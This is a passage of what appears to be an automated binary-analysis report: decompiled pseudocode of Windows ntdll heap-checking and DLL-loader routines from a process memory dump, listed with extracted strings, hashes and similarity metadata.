                                                                                                                									_t280 =  &(_t280[0]);
                                                                                                                								}
                                                                                                                								_t243 = _t278;
                                                                                                                								_t277 = E01241370(_t278, 0x11d4e90);
                                                                                                                								_pop(_t257);
                                                                                                                							} while (_t277 != 0);
                                                                                                                							_v48 = _t243;
                                                                                                                							_t242 = _v52;
                                                                                                                							goto L38;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t191 = _v12;
                                                                                                                					_t260 = _v12 + 4;
                                                                                                                					_v28 = _t260;
                                                                                                                					if(_t260 == 0) {
                                                                                                                						_t275 = _t280;
                                                                                                                						_v16 = _t280;
                                                                                                                					} else {
                                                                                                                						_t275 = L01214620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                                                                                						_t191 = _v12;
                                                                                                                						_v16 = _t275;
                                                                                                                					}
                                                                                                                					if(_t275 == 0) {
                                                                                                                						_v28 = _t280;
                                                                                                                						_t280 = 0xc0000017;
                                                                                                                						goto L47;
                                                                                                                					} else {
                                                                                                                						E0123F3E0(_t275, _v8, _t191);
                                                                                                                						_t285 = _t285 + 0xc;
                                                                                                                						_v48 = _t275;
                                                                                                                						_t279 = _t280;
                                                                                                                						_t281 = E01241370(_v16, 0x11d4e90);
                                                                                                                						_pop(_t262);
                                                                                                                						if(_t281 != 0) {
                                                                                                                							_t244 = _v48;
                                                                                                                							do {
                                                                                                                								 *_t281 = 0;
                                                                                                                								_t282 = _t281 + 2;
                                                                                                                								E0123BB40(_t262,  &_v68, _t244);
                                                                                                                								if(L012043C0( &_v68,  &_v24) != 0) {
                                                                                                                									_t279 =  &(_t279[0]);
                                                                                                                								}
                                                                                                                								_t244 = _t282;
                                                                                                                								_t281 = E01241370(_t282, 0x11d4e90);
                                                                                                                								_pop(_t262);
                                                                                                                							} while (_t281 != 0);
                                                                                                                							_v48 = _t244;
                                                                                                                							_t242 = _v52;
                                                                                                                						}
                                                                                                                						_t201 = _v48;
                                                                                                                						_t280 = 0;
                                                                                                                						if( *_v48 != 0) {
                                                                                                                							E0123BB40(_t262,  &_v68, _t201);
                                                                                                                							if(L012043C0( &_v68,  &_v24) != 0) {
                                                                                                                								_t279 =  &(_t279[0]);
                                                                                                                							}
                                                                                                                						}
                                                                                                                						if(_t279 == 0) {
                                                                                                                							L012177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                                                                                							_v28 = _t280;
                                                                                                                							_v16 = _t280;
                                                                                                                						}
                                                                                                                						_t202 = _v8;
                                                                                                                						if(_v8 != 0) {
                                                                                                                							L012177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                                                                                						}
                                                                                                                						_v8 = _t280;
                                                                                                                						goto L28;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t214 = _v12;
                                                                                                                				_t264 = _v12 + 4;
                                                                                                                				_v40 = _t264;
                                                                                                                				if(_t264 == 0) {
                                                                                                                					_v20 = _t280;
                                                                                                                				} else {
                                                                                                                					_t236 = L01214620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                                                                                					_t280 = _t236;
                                                                                                                					_v20 = _t236;
                                                                                                                					_t214 = _v12;
                                                                                                                				}
                                                                                                                				if(_t280 == 0) {
                                                                                                                					_t161 = 0;
                                                                                                                					_t280 = 0xc0000017;
                                                                                                                					_v40 = 0;
                                                                                                                					goto L48;
                                                                                                                				} else {
                                                                                                                					E0123F3E0(_t280, _v8, _t214);
                                                                                                                					_t285 = _t285 + 0xc;
                                                                                                                					_v48 = _t280;
                                                                                                                					_t283 = E01241370(_t280, 0x11d4e90);
                                                                                                                					_pop(_t267);
                                                                                                                					if(_t283 != 0) {
                                                                                                                						_t245 = _v48;
                                                                                                                						do {
                                                                                                                							 *_t283 = 0;
                                                                                                                							_t284 = _t283 + 2;
                                                                                                                							E0123BB40(_t267,  &_v68, _t245);
                                                                                                                							if(L012043C0( &_v68,  &_v24) != 0) {
                                                                                                                								_t275 = _t275 + 1;
                                                                                                                							}
                                                                                                                							_t245 = _t284;
                                                                                                                							_t283 = E01241370(_t284, 0x11d4e90);
                                                                                                                							_pop(_t267);
                                                                                                                						} while (_t283 != 0);
                                                                                                                						_v48 = _t245;
                                                                                                                						_t242 = _v52;
                                                                                                                					}
                                                                                                                					_t224 = _v48;
                                                                                                                					_t280 = 0;
                                                                                                                					if( *_v48 != 0) {
                                                                                                                						E0123BB40(_t267,  &_v68, _t224);
                                                                                                                						if(L012043C0( &_v68,  &_v24) != 0) {
                                                                                                                							_t275 = _t275 + 1;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					if(_t275 == 0) {
                                                                                                                						L012177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                                                                                						_v40 = _t280;
                                                                                                                						_v20 = _t280;
                                                                                                                					}
                                                                                                                					_t225 = _v8;
                                                                                                                					if(_v8 != 0) {
                                                                                                                						L012177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                                                                                					}
                                                                                                                					_v8 = _t280;
                                                                                                                					goto L16;
                                                                                                                				}
                                                                                                                			}

                                                                                                                Strings
                                                                                                                • Kernel-MUI-Language-Disallowed, xrefs: 01203E97
                                                                                                                • Kernel-MUI-Number-Allowed, xrefs: 01203D8C
                                                                                                                • Kernel-MUI-Language-Allowed, xrefs: 01203DC0
                                                                                                                • Kernel-MUI-Language-SKU, xrefs: 01203F70
                                                                                                                • WindowsExcludedProcs, xrefs: 01203D6F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                • API String ID: 0-258546922
                                                                                                                • Opcode ID: e2a82924e1b4d4afae35701b4c526bc8ae354847570ac49b5d1dc66794ad826b
                                                                                                                • Instruction ID: 40f93b84f8f0331a4eb112a6187e4d6093e29daf48bbc9d0e77a6f943d7f8fcf
                                                                                                                • Opcode Fuzzy Hash: e2a82924e1b4d4afae35701b4c526bc8ae354847570ac49b5d1dc66794ad826b
                                                                                                                • Instruction Fuzzy Hash: 74F19272D20659EFCB16DF98C980AEEBBB9FF58640F10415AEA05E7251E7709E00CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 29%
                                                                                                                			E011F40E1(void* __edx) {
                                                                                                                				void* _t19;
                                                                                                                				void* _t29;
                                                                                                                
                                                                                                                				_t28 = _t19;
                                                                                                                				_t29 = __edx;
                                                                                                                				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                                                                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                						_push("HEAP: ");
                                                                                                                						E011FB150();
                                                                                                                					} else {
                                                                                                                						E011FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                					}
                                                                                                                					E011FB150("Invalid heap signature for heap at %p", _t28);
                                                                                                                					if(_t29 != 0) {
                                                                                                                						E011FB150(", passed to %s", _t29);
                                                                                                                					}
                                                                                                                					_push("\n");
                                                                                                                					E011FB150();
                                                                                                                					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                                                                						 *0x12e6378 = 1;
                                                                                                                						asm("int3");
                                                                                                                						 *0x12e6378 = 0;
                                                                                                                					}
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                				return 1;
                                                                                                                			}






                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                                                                                • API String ID: 0-188067316
                                                                                                                • Opcode ID: 73bec19fac3bf178b375e1e77f9218de51111f01cc65a77964699ddcb60a62d5
                                                                                                                • Instruction ID: dbfdc96560f93d55e617b1d142c0ccff6fd2ac02a7f85377fdb12fac41224029
                                                                                                                • Opcode Fuzzy Hash: 73bec19fac3bf178b375e1e77f9218de51111f01cc65a77964699ddcb60a62d5
                                                                                                                • Instruction Fuzzy Hash: 4A01FC322182429ED32D9769F84DF567BA4DB51F34F1D406DF6054B681CBB4A440C259
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 69%
                                                                                                                			E0121A229(void* __ecx, void* __edx) {
                                                                                                                				signed int _v20;
                                                                                                                				char _v24;
                                                                                                                				char _v28;
                                                                                                                				void* _v44;
                                                                                                                				void* _v48;
                                                                                                                				void* _v56;
                                                                                                                				void* _v60;
                                                                                                                				void* __ebx;
                                                                                                                				signed int _t55;
                                                                                                                				signed int _t57;
                                                                                                                				void* _t61;
                                                                                                                				intOrPtr _t62;
                                                                                                                				void* _t65;
                                                                                                                				void* _t71;
                                                                                                                				signed char* _t74;
                                                                                                                				intOrPtr _t75;
                                                                                                                				signed char* _t80;
                                                                                                                				intOrPtr _t81;
                                                                                                                				void* _t82;
                                                                                                                				signed char* _t85;
                                                                                                                				signed char _t91;
                                                                                                                				void* _t103;
                                                                                                                				void* _t105;
                                                                                                                				void* _t121;
                                                                                                                				void* _t129;
                                                                                                                				signed int _t131;
                                                                                                                				void* _t133;
                                                                                                                
                                                                                                                				_t105 = __ecx;
                                                                                                                				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                                                                                                                				_t103 = __edx;
                                                                                                                				_t129 = __ecx;
                                                                                                                				E0121DF24(__edx,  &_v28, _t133);
                                                                                                                				_t55 =  *(_t129 + 0x40) & 0x00040000;
                                                                                                                				asm("sbb edi, edi");
                                                                                                                				_t121 = ( ~_t55 & 0x0000003c) + 4;
                                                                                                                				if(_t55 != 0) {
                                                                                                                					_push(0);
                                                                                                                					_push(0x14);
                                                                                                                					_push( &_v24);
                                                                                                                					_push(3);
                                                                                                                					_push(_t129);
                                                                                                                					_push(0xffffffff);
                                                                                                                					_t57 = E01239730();
                                                                                                                					__eflags = _t57;
                                                                                                                					if(_t57 < 0) {
                                                                                                                						L17:
                                                                                                                						_push(_t105);
                                                                                                                						E012BA80D(_t129, 1, _v20, 0);
                                                                                                                						_t121 = 4;
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					__eflags = _v20 & 0x00000060;
                                                                                                                					if((_v20 & 0x00000060) == 0) {
                                                                                                                						goto L17;
                                                                                                                					}
                                                                                                                					__eflags = _v24 - _t129;
                                                                                                                					if(_v24 == _t129) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					goto L17;
                                                                                                                				}
                                                                                                                				L1:
                                                                                                                				_push(_t121);
                                                                                                                				_push(0x1000);
                                                                                                                				_push(_t133 + 0x14);
                                                                                                                				_push(0);
                                                                                                                				_push(_t133 + 0x20);
                                                                                                                				_push(0xffffffff);
                                                                                                                				_t61 = E01239660();
                                                                                                                				_t122 = _t61;
                                                                                                                				if(_t61 < 0) {
                                                                                                                					_t62 =  *[fs:0x30];
                                                                                                                					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                                                                                                                					__eflags =  *(_t62 + 0xc);
                                                                                                                					if( *(_t62 + 0xc) == 0) {
                                                                                                                						_push("HEAP: ");
                                                                                                                						E011FB150();
                                                                                                                					} else {
                                                                                                                						E011FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                					}
                                                                                                                					_push( *((intOrPtr*)(_t133 + 0xc)));
                                                                                                                					_push( *((intOrPtr*)(_t133 + 0x14)));
                                                                                                                					_push(_t129);
                                                                                                                					E011FB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                                                                                                                					_t65 = 0;
                                                                                                                					L13:
                                                                                                                					return _t65;
                                                                                                                				}
                                                                                                                				_t71 = E01217D50();
                                                                                                                				_t124 = 0x7ffe0380;
                                                                                                                				if(_t71 != 0) {
                                                                                                                					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                				} else {
                                                                                                                					_t74 = 0x7ffe0380;
                                                                                                                				}
                                                                                                                				if( *_t74 != 0) {
                                                                                                                					_t75 =  *[fs:0x30];
                                                                                                                					__eflags =  *(_t75 + 0x240) & 0x00000001;
                                                                                                                					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                                                                                                                						E012B138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                                                                                                                				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                                                                                                                				if(E01217D50() != 0) {
                                                                                                                					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                				} else {
                                                                                                                					_t80 = _t124;
                                                                                                                				}
                                                                                                                				if( *_t80 != 0) {
                                                                                                                					_t81 =  *[fs:0x30];
                                                                                                                					__eflags =  *(_t81 + 0x240) & 0x00000001;
                                                                                                                					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                                                                                                                						__eflags = E01217D50();
                                                                                                                						if(__eflags != 0) {
                                                                                                                							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                						}
                                                                                                                						E012B1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t82 = E01217D50();
                                                                                                                				_t125 = 0x7ffe038a;
                                                                                                                				if(_t82 != 0) {
                                                                                                                					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                                				} else {
                                                                                                                					_t85 = 0x7ffe038a;
                                                                                                                				}
                                                                                                                				if( *_t85 != 0) {
                                                                                                                					__eflags = E01217D50();
                                                                                                                					if(__eflags != 0) {
                                                                                                                						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                                						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                                					}
                                                                                                                					E012B1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                                                                                                                				_t91 =  *(_t103 + 2);
                                                                                                                				if((_t91 & 0x00000004) != 0) {
                                                                                                                					E0124D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
                                                                                                                					_t91 =  *(_t103 + 2);
                                                                                                                				}
                                                                                                                				 *(_t103 + 2) = _t91 & 0x00000017;
                                                                                                                				_t65 = 1;
                                                                                                                				goto L13;
                                                                                                                			}






























                                                                                                                0x0121a266
                                                                                                                0x0121a26f
                                                                                                                0x0121a270
                                                                                                                0x0121a276
                                                                                                                0x0121a277
                                                                                                                0x0121a279
                                                                                                                0x0121a27e
                                                                                                                0x0121a282
                                                                                                                0x01261db5
                                                                                                                0x01261dbb
                                                                                                                0x01261dc1
                                                                                                                0x01261dc5
                                                                                                                0x01261de4
                                                                                                                0x01261de9
                                                                                                                0x01261dc7
                                                                                                                0x01261ddc
                                                                                                                0x01261de1
                                                                                                                0x01261def
                                                                                                                0x01261df3
                                                                                                                0x01261df7
                                                                                                                0x01261dfe
                                                                                                                0x01261e06
                                                                                                                0x0121a302
                                                                                                                0x0121a308
                                                                                                                0x0121a308
                                                                                                                0x0121a288
                                                                                                                0x0121a28d
                                                                                                                0x0121a294
                                                                                                                0x01261cc1
                                                                                                                0x0121a29a
                                                                                                                0x0121a29a
                                                                                                                0x0121a29a
                                                                                                                0x0121a29f
                                                                                                                0x01261ccb
                                                                                                                0x01261cd1
                                                                                                                0x01261cd8
                                                                                                                0x01261cea
                                                                                                                0x01261cea
                                                                                                                0x01261cd8
                                                                                                                0x0121a2a9
                                                                                                                0x0121a2af
                                                                                                                0x0121a2bc
                                                                                                                0x01261cfd
                                                                                                                0x0121a2c2
                                                                                                                0x0121a2c2
                                                                                                                0x0121a2c2
                                                                                                                0x0121a2c7
                                                                                                                0x01261d07
                                                                                                                0x01261d0d
                                                                                                                0x01261d14
                                                                                                                0x01261d1f
                                                                                                                0x01261d21
                                                                                                                0x01261d2c
                                                                                                                0x01261d2c
                                                                                                                0x01261d2c
                                                                                                                0x01261d47
                                                                                                                0x01261d47
                                                                                                                0x01261d14
                                                                                                                0x0121a2cd
                                                                                                                0x0121a2d2
                                                                                                                0x0121a2d9
                                                                                                                0x01261d5a
                                                                                                                0x0121a2df
                                                                                                                0x0121a2df
                                                                                                                0x0121a2df
                                                                                                                0x0121a2e4
                                                                                                                0x01261d69
                                                                                                                0x01261d6b
                                                                                                                0x01261d76
                                                                                                                0x01261d76
                                                                                                                0x01261d76
                                                                                                                0x01261d91
                                                                                                                0x01261d91
                                                                                                                0x0121a2ea
                                                                                                                0x0121a2f0
                                                                                                                0x0121a2f5
                                                                                                                0x01261da8
                                                                                                                0x01261dad
                                                                                                                0x01261dad
                                                                                                                0x0121a2fd
                                                                                                                0x0121a300
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                • API String ID: 2994545307-2586055223
                                                                                                                • Opcode ID: 92bbd5816a8f60bc1a566e58cfef23cf3e32d566407ea54b72bfd91f51b26e8c
                                                                                                                • Instruction ID: 93075ff5c9c1c6a66e9dd751ae062507fd4ac750223f3f79d013b3b74da3c89c
                                                                                                                • Opcode Fuzzy Hash: 92bbd5816a8f60bc1a566e58cfef23cf3e32d566407ea54b72bfd91f51b26e8c
                                                                                                                • Instruction Fuzzy Hash: 765104322256829FE722DB68C845F777BE8FFE0750F180468F6558B2D5D764E840CB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 44%
                                                                                                                			E01228E00(void* __ecx) {
                                                                                                                				signed int _v8;
                                                                                                                				char _v12;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				intOrPtr* _t32;
                                                                                                                				intOrPtr _t35;
                                                                                                                				intOrPtr _t43;
                                                                                                                				void* _t46;
                                                                                                                				intOrPtr _t47;
                                                                                                                				void* _t48;
                                                                                                                				signed int _t49;
                                                                                                                				void* _t50;
                                                                                                                				intOrPtr* _t51;
                                                                                                                				signed int _t52;
                                                                                                                				void* _t53;
                                                                                                                				intOrPtr _t55;
                                                                                                                
                                                                                                                				_v8 =  *0x12ed360 ^ _t52;
                                                                                                                				_t49 = 0;
                                                                                                                				_t48 = __ecx;
                                                                                                                				_t55 =  *0x12e8464; // 0x74b10110
                                                                                                                				if(_t55 == 0) {
                                                                                                                					L9:
                                                                                                                					if( !_t49 >= 0) {
                                                                                                                						if(( *0x12e5780 & 0x00000003) != 0) {
                                                                                                                							E01275510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                                                                                						}
                                                                                                                						if(( *0x12e5780 & 0x00000010) != 0) {
                                                                                                                							asm("int3");
                                                                                                                						}
                                                                                                                					}
                                                                                                                					return E0123B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                                                                                				}
                                                                                                                				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                                                                                				_t43 =  *0x12e7984; // 0xd92c28
                                                                                                                				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                                                                                					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                                                                                					if(_t48 == _t43) {
                                                                                                                						_t50 = 0x5c;
                                                                                                                						if( *_t32 == _t50) {
                                                                                                                							_t46 = 0x3f;
                                                                                                                							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                                                                                								_t32 = _t32 + 8;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t51 =  *0x12e8464; // 0x74b10110
                                                                                                                					 *0x12eb1e0(_t47, _t32,  &_v12);
                                                                                                                					_t49 =  *_t51();
                                                                                                                					if(_t49 >= 0) {
                                                                                                                						L8:
                                                                                                                						_t35 = _v12;
                                                                                                                						if(_t35 != 0) {
                                                                                                                							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                                                                                								E01229B10( *((intOrPtr*)(_t48 + 0x48)));
                                                                                                                								_t35 = _v12;
                                                                                                                							}
                                                                                                                							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                                                                                						}
                                                                                                                						goto L9;
                                                                                                                					}
                                                                                                                					if(_t49 != 0xc000008a) {
                                                                                                                						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                                                                                							if(_t49 != 0xc00000bb) {
                                                                                                                								goto L8;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					if(( *0x12e5780 & 0x00000005) != 0) {
                                                                                                                						_push(_t49);
                                                                                                                						E01275510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                                                                                						_t53 = _t53 + 0x1c;
                                                                                                                					}
                                                                                                                					_t49 = 0;
                                                                                                                					goto L8;
                                                                                                                				} else {
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                			}





















                                                                                                                Strings
                                                                                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 01269357
                                                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 0126933B, 01269367
                                                                                                                • LdrpFindDllActivationContext, xrefs: 01269331, 0126935D
                                                                                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0126932A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                • API String ID: 0-3779518884
                                                                                                                • Opcode ID: 94135081875e05647790642a4007509c6b8f67c876143a9e4b0da6a265dcceb2
                                                                                                                • Instruction ID: 3125a5de795dd51d3fd2503e2e06d67172ecc13b9b36fdb9b5e9c4ffad4a948e
                                                                                                                • Opcode Fuzzy Hash: 94135081875e05647790642a4007509c6b8f67c876143a9e4b0da6a265dcceb2
                                                                                                                • Instruction Fuzzy Hash: 8A41F922A70337BEEF3AAB1C984DB7DB6E4AB04258F054169F7045B152E7B0DCC08781
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                • API String ID: 2994545307-336120773
                                                                                                                • Opcode ID: a6b33f7a356f35c244b2d96d6008635e0daa8db8fd33e2385f32fe9b8cd384c4
                                                                                                                • Instruction ID: 93cb64db4e3de41a2ec93cbbb5ea1d84a386dae3dbcbb9f070333d0f688c5805
                                                                                                                • Opcode Fuzzy Hash: a6b33f7a356f35c244b2d96d6008635e0daa8db8fd33e2385f32fe9b8cd384c4
                                                                                                                • Instruction Fuzzy Hash: 28317932224191FFD324EB99C8D9FA777E8EF047A4F284059F606CB292D770A880C759
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 83%
                                                                                                                			E01208794(void* __ecx) {
                                                                                                                				signed int _v0;
                                                                                                                				char _v8;
                                                                                                                				signed int _v12;
                                                                                                                				void* _v16;
                                                                                                                				signed int _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v40;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				intOrPtr* _t77;
                                                                                                                				signed int _t80;
                                                                                                                				signed char _t81;
                                                                                                                				signed int _t87;
                                                                                                                				signed int _t91;
                                                                                                                				void* _t92;
                                                                                                                				void* _t94;
                                                                                                                				signed int _t95;
                                                                                                                				signed int _t103;
                                                                                                                				signed int _t105;
                                                                                                                				signed int _t110;
                                                                                                                				signed int _t118;
                                                                                                                				intOrPtr* _t121;
                                                                                                                				intOrPtr _t122;
                                                                                                                				signed int _t125;
                                                                                                                				signed int _t129;
                                                                                                                				signed int _t131;
                                                                                                                				signed int _t134;
                                                                                                                				signed int _t136;
                                                                                                                				signed int _t143;
                                                                                                                				signed int* _t147;
                                                                                                                				signed int _t151;
                                                                                                                				void* _t153;
                                                                                                                				signed int* _t157;
                                                                                                                				signed int _t159;
                                                                                                                				signed int _t161;
                                                                                                                				signed int _t166;
                                                                                                                				signed int _t168;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_t153 = __ecx;
                                                                                                                				_t159 = 0;
                                                                                                                				_t121 = __ecx + 0x3c;
                                                                                                                				if( *_t121 == 0) {
                                                                                                                					L2:
                                                                                                                					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                                                                                					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                                                                                						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                                                                                						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                                                                                						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                                                                                							L6:
                                                                                                                							if(E0120934A() != 0) {
                                                                                                                								_t159 = E0127A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                                                                                								__eflags = _t159;
                                                                                                                								if(_t159 < 0) {
                                                                                                                									_t81 =  *0x12e5780; // 0x0
                                                                                                                									__eflags = _t81 & 0x00000003;
                                                                                                                									if((_t81 & 0x00000003) != 0) {
                                                                                                                										_push(_t159);
                                                                                                                										E01275510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                                                                                										_t81 =  *0x12e5780; // 0x0
                                                                                                                									}
                                                                                                                									__eflags = _t81 & 0x00000010;
                                                                                                                									if((_t81 & 0x00000010) != 0) {
                                                                                                                										asm("int3");
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_t159 = E0120849B(0, _t122, _t153, _t159, _t180);
                                                                                                                							if(_t159 >= 0) {
                                                                                                                								goto L6;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t80 = _t159;
                                                                                                                						goto L8;
                                                                                                                					} else {
                                                                                                                						_t125 = 0x13;
                                                                                                                						asm("int 0x29");
                                                                                                                						_push(0);
                                                                                                                						_push(_t159);
                                                                                                                						_t161 = _t125;
                                                                                                                						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                                                                                						_t143 = 0;
                                                                                                                						_v40 = _t161;
                                                                                                                						_t118 = 0;
                                                                                                                						_push(_t153);
                                                                                                                						__eflags = _t87;
                                                                                                                						if(_t87 != 0) {
                                                                                                                							_t118 = _t87 + 0x5d8;
                                                                                                                							__eflags = _t118;
                                                                                                                							if(_t118 == 0) {
                                                                                                                								L46:
                                                                                                                								_t118 = 0;
                                                                                                                							} else {
                                                                                                                								__eflags =  *(_t118 + 0x30);
                                                                                                                								if( *(_t118 + 0x30) == 0) {
                                                                                                                									goto L46;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_v32 = 0;
                                                                                                                						_v28 = 0;
                                                                                                                						_v16 = 0;
